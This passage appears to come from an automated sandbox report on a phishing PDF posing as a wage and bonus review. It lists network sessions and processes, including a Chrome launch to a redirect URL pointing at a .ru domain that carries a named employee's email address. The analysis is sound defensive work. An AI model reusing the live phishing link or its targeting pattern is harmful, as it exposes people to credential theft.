                                                                          Data Ascii: ATH 2 CON\DEVICE 1360MS-CV: xvE3ilDzu0O//rAl.2Context: 8db3adbc7f4c723<device><compact-ticket>t=EwCYA+pIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAZUeOoEulYfpyq+F+MbwQ/pzGaX96fQqVGw+0taGw3T70L6VGVruJux1+8SY6MOE067w48feEYzwJZHAVDE5pUbDpKE18dfy79O68ICQQGBCmvb
                                                                          2025-03-04 17:26:31 UTC217OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 36 0d 0a 4d 53 2d 43 56 3a 20 78 76 45 33 69 6c 44 7a 75 30 4f 2f 2f 72 41 6c 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 64 62 33 61 64 62 63 37 66 34 63 37 32 33 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                          Data Ascii: BND 3 CON\WNS 0 196MS-CV: xvE3ilDzu0O//rAl.3Context: 8db3adbc7f4c723<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                          2025-03-04 17:26:32 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                          Data Ascii: 202 1 CON 58
                                                                          2025-03-04 17:26:32 UTC58INData Raw: 4d 53 2d 43 56 3a 20 5a 37 31 7a 45 78 41 56 44 55 57 32 6d 79 32 55 5a 65 6e 4b 69 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                          Data Ascii: MS-CV: Z71zExAVDUW2my2UZenKiQ.0Payload parsing failed.


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          16192.168.2.65004540.115.3.253443
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-03-04 17:27:06 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 6f 36 38 33 65 33 67 49 6e 55 36 62 65 4d 62 62 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 61 34 37 34 34 34 35 64 34 62 39 39 32 33 31 0d 0a 0d 0a
                                                                          Data Ascii: CNT 1 CON 305MS-CV: o683e3gInU6beMbb.1Context: ea474445d4b99231
                                                                          2025-03-04 17:27:06 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                          Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                          2025-03-04 17:27:06 UTC1384OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 33 36 31 0d 0a 4d 53 2d 43 56 3a 20 6f 36 38 33 65 33 67 49 6e 55 36 62 65 4d 62 62 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 61 34 37 34 34 34 35 64 34 62 39 39 32 33 31 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 59 41 2b 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 5a 55 65 4f 6f 45 75 6c 59 66 70 79 71 2b 46 2b 4d 62 77 51 2f 70 7a 47 61 58 39 36 66 51 71 56 47 77 2b 30 74 61 47 77 33 54 37 30 4c 36 56 47 56 72 75 4a 75 78 31 2b 38 53 59 36 4d 4f 45 30 36 37 77 34 38 66 65 45 59 7a 77 4a 5a 48 41 56 44 45 35 70 55 62 44 70 4b 45 31 38 64 66 79 37 39 4f 36 38 49 43 51 51 47 42 43 6d 76
                                                                          Data Ascii: ATH 2 CON\DEVICE 1361MS-CV: o683e3gInU6beMbb.2Context: ea474445d4b99231<device><compact-ticket>t=EwCYA+pIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAZUeOoEulYfpyq+F+MbwQ/pzGaX96fQqVGw+0taGw3T70L6VGVruJux1+8SY6MOE067w48feEYzwJZHAVDE5pUbDpKE18dfy79O68ICQQGBCmv
                                                                          2025-03-04 17:27:06 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 6f 36 38 33 65 33 67 49 6e 55 36 62 65 4d 62 62 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 61 34 37 34 34 34 35 64 34 62 39 39 32 33 31 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                          Data Ascii: BND 3 CON\WNS 0 197MS-CV: o683e3gInU6beMbb.3Context: ea474445d4b99231<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                          2025-03-04 17:27:06 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                          Data Ascii: 202 1 CON 58
                                                                          2025-03-04 17:27:06 UTC58INData Raw: 4d 53 2d 43 56 3a 20 37 77 5a 43 70 37 70 4c 43 6b 43 69 32 30 55 37 2b 4c 73 46 45 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                          Data Ascii: MS-CV: 7wZCp7pLCkCi20U7+LsFEw.0Payload parsing failed.


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          17192.168.2.65005040.115.3.253443
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-03-04 17:28:16 UTC70OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 34 0d 0a 4d 53 2d 43 56 3a 20 47 78 63 32 78 31 4f 52 6f 55 79 59 31 32 44 67 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 63 32 32 63 33 63 35 38 65 37 37 35 65 35 0d 0a 0d 0a
                                                                          Data Ascii: CNT 1 CON 304MS-CV: Gxc2x1ORoUyY12Dg.1Context: 6c22c3c58e775e5
                                                                          2025-03-04 17:28:16 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                          Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                          2025-03-04 17:28:16 UTC1383OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 33 36 30 0d 0a 4d 53 2d 43 56 3a 20 47 78 63 32 78 31 4f 52 6f 55 79 59 31 32 44 67 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 63 32 32 63 33 63 35 38 65 37 37 35 65 35 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 59 41 2b 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 5a 55 65 4f 6f 45 75 6c 59 66 70 79 71 2b 46 2b 4d 62 77 51 2f 70 7a 47 61 58 39 36 66 51 71 56 47 77 2b 30 74 61 47 77 33 54 37 30 4c 36 56 47 56 72 75 4a 75 78 31 2b 38 53 59 36 4d 4f 45 30 36 37 77 34 38 66 65 45 59 7a 77 4a 5a 48 41 56 44 45 35 70 55 62 44 70 4b 45 31 38 64 66 79 37 39 4f 36 38 49 43 51 51 47 42 43 6d 76 62
                                                                          Data Ascii: ATH 2 CON\DEVICE 1360MS-CV: Gxc2x1ORoUyY12Dg.2Context: 6c22c3c58e775e5<device><compact-ticket>t=EwCYA+pIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAZUeOoEulYfpyq+F+MbwQ/pzGaX96fQqVGw+0taGw3T70L6VGVruJux1+8SY6MOE067w48feEYzwJZHAVDE5pUbDpKE18dfy79O68ICQQGBCmvb
                                                                          2025-03-04 17:28:16 UTC217OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 36 0d 0a 4d 53 2d 43 56 3a 20 47 78 63 32 78 31 4f 52 6f 55 79 59 31 32 44 67 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 63 32 32 63 33 63 35 38 65 37 37 35 65 35 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                          Data Ascii: BND 3 CON\WNS 0 196MS-CV: Gxc2x1ORoUyY12Dg.3Context: 6c22c3c58e775e5<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                          2025-03-04 17:28:16 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                          Data Ascii: 202 1 CON 58
                                                                          2025-03-04 17:28:16 UTC58INData Raw: 4d 53 2d 43 56 3a 20 43 30 6c 48 42 4a 54 52 44 45 71 4f 61 71 6f 7a 64 51 63 46 30 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                          Data Ascii: MS-CV: C0lHBJTRDEqOaqozdQcF0Q.0Payload parsing failed.


                                                                          Click to jump to process

                                                                          Click to jump to process

                                                                          • File
                                                                          • Registry

                                                                          Click to dive into process behavior distribution

                                                                          Target ID:0
                                                                          Start time:12:25:01
                                                                          Start date:04/03/2025
                                                                          Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\Review Tempus wages bonus For 2025 Compensation Disbursement.pdf"
                                                                          Imagebase:0x7ff651090000
                                                                          File size:5'641'176 bytes
                                                                          MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true
                                                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                                          Target ID:2
                                                                          Start time:12:25:02
                                                                          Start date:04/03/2025
                                                                          Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                                          Imagebase:0x7ff70df30000
                                                                          File size:3'581'912 bytes
                                                                          MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true
                                                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                                          Target ID:4
                                                                          Start time:12:25:02
                                                                          Start date:04/03/2025
                                                                          Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2124 --field-trial-handle=1728,i,2651444395611178824,4872869830403075443,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                                          Imagebase:0x7ff70df30000
                                                                          File size:3'581'912 bytes
                                                                          MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:6
                                                                          Start time:12:25:04
                                                                          Start date:04/03/2025
                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://ronl.org/redirect?url=https://1C.hypernesdt.ru/A86bjH/#Xesmeralda.arriaga@tempus.com
                                                                          Imagebase:0x7ff684c40000
                                                                          File size:3'242'272 bytes
                                                                          MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:7
                                                                          Start time:12:25:05
                                                                          Start date:04/03/2025
                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2652 --field-trial-handle=2604,i,702203083375713400,12249269372178961096,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                          Imagebase:0x7ff684c40000
                                                                          File size:3'242'272 bytes
                                                                          MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:11
                                                                          Start time:12:25:26
                                                                          Start date:04/03/2025
                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "http://mailto:digit@nelsoncourt.us"
                                                                          Imagebase:0x7ff684c40000
                                                                          File size:3'242'272 bytes
                                                                          MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:false

                                                                          Target ID:12
                                                                          Start time:12:25:26
                                                                          Start date:04/03/2025
                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=2004,i,10258909886674376050,18371129370388586729,262144 /prefetch:8
                                                                          Imagebase:0x7ff684c40000
                                                                          File size:3'242'272 bytes
                                                                          MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:false

                                                                          No disassembly